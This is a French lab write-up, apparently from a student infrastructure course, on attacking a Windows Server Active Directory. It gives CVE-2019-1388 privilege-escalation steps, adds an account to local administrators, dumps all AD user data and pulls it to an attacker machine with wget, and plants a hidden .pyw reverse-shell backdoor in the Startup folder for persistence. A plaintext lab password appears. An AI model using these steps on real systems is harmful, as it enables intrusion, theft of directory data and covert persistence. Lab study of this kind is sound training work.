# Exploitation Active Directory

## Mise en place de l'AD DS

Nous avons utiliser la version de windows server que nous avons vu en cours dédié à cette matière : à savoir Windows Server 2016 Datacenter edition.

### Enlever la config renforcée Internet Explorer

Gestionnaire de serveur -> Configuration de sécurité renforcée d'internet explorer -> Désactivé


### Création utilisateurs dans l'Active Directory

Gestionnaire de serveur -> Gérer -> AD -> Users -> clique droit panel de droite -> nouvel utilisateur


### Accès bureau à distance avec utilisateurs non admin

windows + R -> secpol.msc ->  Paramètres de sécurité -> Stratégies locales -> Attribution des droits utilisateurs -> double clique sur Autoriser l'ouverture de sessions par les services bureau à distance -> Ajouter utilisateur/groupe


## Mise en place des machines se connectant à l'AD DS

Avoir deux machines (ici rocky linux) sur le même réseau que l'AD DS et avec une checklist complétée.

*Vérifier que les deux machines soient à la même heure que l'active directory.*

- Installation des paquets requis pour se connecter à un AD depuis un linux : 
```bash
[marty@ATTACKER ~]$ sudo dnf install realmd oddjob oddjob-mkhomedir sssd adcli krb5-workstation
```

- Configuration de sssd : 
```bash
[marty@ATTACKER ~]$ sudo cat /etc/sssd/sssd.conf
[sssd]
domains = infra.local
config_file_version = 2
services = nss, pam

[domain/infra.local]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = INFRA.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = infra.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
```

Ne pas oublier d'appliquer les changements :

```bash
[marty@ATTACKER ~]$ sudo systemctl restart sssd
```

- Configuration des DNS : 
```bash
[marty@ATTACKER ~]$ cat /etc/sysconfig/network-scripts/ifcfg-enp0s3
NAME=lan
DEVICE=enp0s3

BOOTPROTO=static
ONBOOT=yes

IPADDR=192.168.50.11
NETMASK=255.255.255.0

DNS1=192.168.50.10
```

Ne pas oublier d'appliquer les changements :

```bash
[marty@ATTACKER ~]$ sudo systemctl restart NetworkManager
```

Vérification des modifications avec un `dig` :
```bash
[marty@ATTACKER ~]$ dig infra.local
[...]
;; ANSWER SECTION:
infra.local.            600     IN      A       192.168.50.10
infra.local.            600     IN      A       10.0.3.15

;; Query time: 3 msec
;; SERVER: 192.168.50.10#53(192.168.50.10)
;; WHEN: Wed Apr 05 14:35:51 CEST 2023
;; MSG SIZE  rcvd: 8`4
```

Vérification que l'on peut interagir avec l'AD DS :
```bash
[marty@ATTACKER ~]$ sudo adcli info infra.local
[domain]
domain-name = infra.local
domain-short = INFRA
domain-forest = infra.local
domain-controller = SERVEUR.infra.local
domain-controller-site = Default-First-Site-Name
domain-controller-flags = pdc gc ldap ds kdc timeserv closest writable good-timeserv full-secret ads-web
domain-controller-usable = yes
domain-controllers = SERVEUR.infra.local
[computer]
computer-site = Default-First-Site-Name
```

- Rejoindre le domain :
```bash
[marty@ATTACKER ~]$ sudo realm join INFRA.local
```

## Connection à distance via protocol RDP :
- Connexion via Remmina
```bash
sudo apt install remmina
```
- Nouvelle connexion :
    - Server : `192.168.50.11`
    - Username : attacker
    - Password : Admin69@
    - Protocol : RDP


## Elévation de privilèges via CVE-2019–1388 :
*CVE-2019–1388: Windows Privilege Escalation Through UAC*

Téléchargement du fichier HHUPD.EXE : https://github.com/jas502n/CVE-2019-1388

#### Execution de l'exploit :

Execution HHUPD.EXE -> Afficher plus de détails -> Afficher les informations sur le certificat de l'éditeur -> cliquer sur Verisign Commercial Software Publishers CA -> Fermer le .exe et ses pop-up -> Enregistrer la page du navigateur qui s'est ouverte (Fichier -> Enregistrer sous ...) -> Mettre en nom de fichier "c:\Windows\System32\*.*" enregistrer.
Chercher cmd.exe -> clique droit -> open

Nous avons maintenant un cmd en administrateur.
```
C:\Windows\system32>whoami
autorite nt\système
```

### Devenir Administrateur permanent

- Dans le CMD :
```
C:\Windows\system32>net user attacker /active:yes
La commande s'est terminée correctement.
C:\Windows\system32>net localgroup Administrateurs attacker /add
La commande s'est terminée correctement.
PS C:\Users\tapis> net user attacker
Nom d’utilisateur                              attacker
[...]
Appartient aux groupes locaux                  *Administrateurs
                                               *Utilisateurs du Bureau
Appartient aux groupes globaux                 *Utilisateurs du domaine
La commande s’est terminée correctement.
```

## Exemple récupération et extraction de données sensibles 
- Installation de Python + ouverture d'un simple serveur python :
    
    - Téléchargement sur [le site officiel python](https://www.python.org/downloads/)

    - Lancer l'installation en tant qu'administrateur, mettre python dans les variables d'environnement.
    - Lancement serveur 
    ```
    PS C:\Users\attacker> python -m http.server 9999
    Serving HTTP on :: port 9999 (http://[::]:9999/) ...
    ```

- Récupération des propriétés des utilisateurs vers [infos.txt](https://gitlab.com/martyduniaud98/infra_lt_md_b2/-/blob/main/infos.txt):

```
Get-ADUser -Filter * -Properties * | Out-file C:\Users\attacker\Desktop\infos.txt
```

- Téléchargement du fichier txt sur la machine Linux attacker : 
```
wget http://192.168.50.10:9999/C:\Users\attacker\Desktop\infos.txt
```

Nous pouvons voir qu'il y a deux utilisateurs de plus sur l'AD DS. Nous obtenons également des informations tels que les adresses...

## Reverse shell python servant de porte dérobée

Le script côté attaquant : [backdoor_server](https://gitlab.com/martyduniaud98/infra_lt_md_b2/-/blob/main/backdoor_serveur.py)
Le script côté AD : [backdoor_client](https://gitlab.com/martyduniaud98/infra_lt_md_b2/-/blob/main/backdoor_client.pyw) 

#### Mise en place de la porte dérobée
- Ouverture d'un serveur python sur machine linux attacker
    - `python3 -m http.server 7777`

- Téléchargement du fichier `backdoor_client` sur l'AD
    - `wget  http://192.168.50.11:9999/home/marty/backdoor_client.pyw`

- Ouverture des ports nécessaires sur la machine linux :
    ```bash
    [marty@ATTACKER ~]$ sudo firewall-cmd --add-port=32000/tcp --permanent
    [marty@ATTACKER ~]$ sudo firewall-cmd --reload
    ```
**Pour que le script s'éxécute en arrière plan, il faut l'enregistrer en .pyw et non .py, cela permet une plus grande discrétion.**

- Lancement du script `backdoor_client.pyw`
    - Lancement automatique au prochain démarrage de la machine :
    Copier le fichier backdoor client dans : `C:\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`
    - Lancement manuel :
    Double clique sur le fichier (penser à supprimer le fichier et ne garder que la copie dans les fichiers de démarrage)
    
    
*Copie de la porte dérobée sur les autres comptes de la même façon (en modifiant le port d'écoute à chaque fois)*

- Dernière étape :
    - Dès que le script est lancé sur la machine client, lancement du script `backdoor_server.py` sur la machine linux, nous voilà avec une porte dérobée.

Nous avons maintenant une porte dérobée sur chaque utilisateur de l'AD DS
